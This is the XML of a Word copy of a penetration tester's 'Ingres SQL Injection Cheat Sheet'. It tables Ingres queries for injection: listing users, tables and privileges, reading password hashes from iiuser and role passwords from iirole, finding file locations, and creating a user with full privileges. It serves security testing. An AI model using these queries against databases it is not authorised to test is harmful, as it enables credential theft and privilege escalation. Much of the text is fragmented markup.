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uto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="31373A"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="31373A"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Ingres SQL Injection Cheat Sheet</w:t>
      </w:r>
    </w:p>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Ingres seems to be one of the less common database backends for web applications, so I thought it would be worth installing it and making some notes to make my next Ingres-based web app test a little easier.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Below are some tabulated notes on how to do many of thing you’d normally do via SQL injection.  All tests were performed on Ingres 9.2.0 alpha Build 108 for Linux.  The Ingres download page is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"http://ingres.com/downloads/prod-comm-download.php"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6"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="0099BB"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>here</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This page will probably remain a work-in-progress for some time yet.  I’ll update it as I learn more.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r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4C5356"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>This post is part of series of SQL Injection Cheat Sheets.  In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend.  This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet.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I’m not planning to write one for MS Access, but there’s a great </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begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="0099BB"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html" </w:instrTex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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="0099BB"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>MS Access Cheat Sheet here</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="0099BB"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4C5356"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>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30"/>
        <w:gridCol w:w="77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Version</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dbmsinfo(‘_version’);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Comments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123; — comment</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123; /* comment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Current User</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dbmsinfo(‘session_user’);</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dbmsinfo(‘system_user’);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Users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First connect to iidbdb, then:</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name, password FROM iiuser; — or</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own FROM iidatabase;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Create Users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create user testuser with password = ‘testuser’;– priv</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Password Hashes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First connect to iidbdb, then:</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name, password from iiuser;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Privileges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dbmsinfo(‘db_admin’);</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dbmsinfo(‘create_table’);</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dbmsinfo(‘create_procedure’);</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dbmsinfo(‘security_priv’);</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dbmsinfo(‘select_syscat’);</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dbmsinfo(‘db_privileges’);</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dbmsinfo(‘current_priv_mask’);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DBA Accounts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Current Database</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Databases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name FROM iidatabase; — connect to iidbdb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Columns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column_name, column_datatype, table_name, table_owner from iicolumns;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Tables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table_name, table_owner from iitables;</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relid, relowner, relloc from iirelation;</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relid, relowner, relloc from iirelation where relowner != ‘$ingres’;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Find Tables From Column Name</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table_name, table_owner FROM iicolumns WHERE column_name = ‘value’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Nth Row</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Astoundingly, this </w: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instrText xml:space="preserve"> HYPERLINK "http://community.ingres.com/forums/viewtopic.php?p=6050" </w:instrTex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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>doesn’t</w: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end"/>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seem to be possible!  This is as close as you can get:select top 10 blah from table;</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first 10 blah form table;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Nth Char</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substr(‘abc’, 2, 1); — returns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Bitwise AND</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The function “bit_and” exists, but seems hard to use.  Here’s an</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example of ANDing 3 and 5 together.  The result is a “byte” type</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with value ?01:select substr(bit_and(cast(3 as byte), cast(5 as byte)),1,1);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ASCII Value -&gt; Char</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Char -&gt; ASCII Value</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(The “ascii” function exists, but doesn’t seem to do what I’d expect.)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Casting</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cast(123 as varchar);</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cast(’123′ as integer);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String Concatenation</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‘abc’ || ‘def’;</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If Statement</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Case Statement</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Avoiding Quotes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Time Delay</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???See </w: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instrText xml:space="preserve"> HYPERLINK "http://www.microsoft.com/technet/community/columns/secmvp/sv0907.mspx" </w:instrTex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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>Heavy Queries</w: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end"/>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article for some ideas.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Make DNS Requests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Command Execution</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Impossible?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Local File Access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Hostname, IP Address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dbmsinfo(‘ima_server’)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Location of DB files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dbdev, ckpdev, jnldev, sortdev FROM iidatabase WHERE name = ‘value’ — primary location of db</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lname FROM iiextend WHERE dname = ‘value’ — extended location of db</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are FROM iilocations where lname = ‘value’ – all area (ie directory) linked with a location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Default/System Databases</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name FROM iidatabase WHERE own = ‘$ingres’ — connect to iidbdb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Installing Locally</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The Ingres database can be downloaded for free from </w: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instrText xml:space="preserve"> HYPERLINK "http://esd.ingres.com/" </w:instrTex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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>http://esd.ingres.com/</w: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end"/>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A pre-built Linux-based Ingres Database Server can be download from</w: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begin"/>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instrText xml:space="preserve"> HYPERLINK "http://www.vmware.com/appliances/directory/832" </w:instrTex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separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="6"/>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="0099BB"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:u w:val="none"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>http://www.vmware.com/appliances/directory/832</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="0099BB"/>
                <w:spacing w:val="0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:u w:val="none"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baselin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Database Client</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There is a client called “sql” which can be used for local connections (at least) in the  database server package above.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Logging in from command line</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su -  ingres</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sql iidbdb</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select dbmsinfo(‘_version’); go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730"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Identifying on the network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7754"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TODO</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rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4C5356"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>The following areas are interesting enough to include on this page, but I haven’t researched them for other databases:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="1048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781"/>
        <w:gridCol w:w="67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78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Style w:val="5"/>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="4C5356"/>
                <w:spacing w:val="0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="670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Style w:val="5"/>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="4C5356"/>
                <w:spacing w:val="0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>SQL / Comments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78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Batching Queries Allowed?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="670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Not via DBI in PERL.  Subsequent statements seem to get ignored:</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blah from table where foo = 1; select … doesn’t matter this is ignored.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78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FROM clause mandated in SELECTs?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="670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No.  You don’t need to select form “dual” or anything.  The following is legal:</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8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UNION supported</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="670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Yes.  Nothing tricky here.  The following is legal:</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1 union select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78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Enumerate Tables Privs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="670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table_name, permit_user, permit_type from iiaccess;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78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Length of a string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="670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length(‘abc’); — returns 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78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 Roles and passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="670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First you need to connect to iidbdb, then:</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roleid, rolepass from iirole;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378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List Database Procedures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="670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First you need to connect to iidbdb, then:</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select dbp_name,  dbp_owner from iiprocedure;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3781"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Create Users + Granting Privs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6703" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="E7E7E7" w:sz="6" w:space="0"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="360" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="360" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="262" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="4C5356"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pP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First you need to connect to iidbdb, then:</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create user pm with password = ‘password’;</w:t>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br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="4C5356"/>
                <w:spacing w:val="0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>grant all on current installation to pm;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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62" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4C5356"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pP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auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="E0002EFF" w:usb1="C0007843" w:usb2="00000009" w:usb3="00000000" w:csb0="400001FF" w:csb1="FFFF0000"/>
  </w:font>
  <w:font w:name="Brush Script MT">
    <w:panose1 w:val="0306080204040607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EE7884"/>
    <w:rsid w:val="17894115"/>
    <w:rsid w:val="224B5D59"/>
    <w:rsid w:val="6350278B"/>
    <w:rsid w:val="683665DC"/>
    <w:rsid w:val="77D05B9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ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体"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13840</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-01-20T02:20:55Z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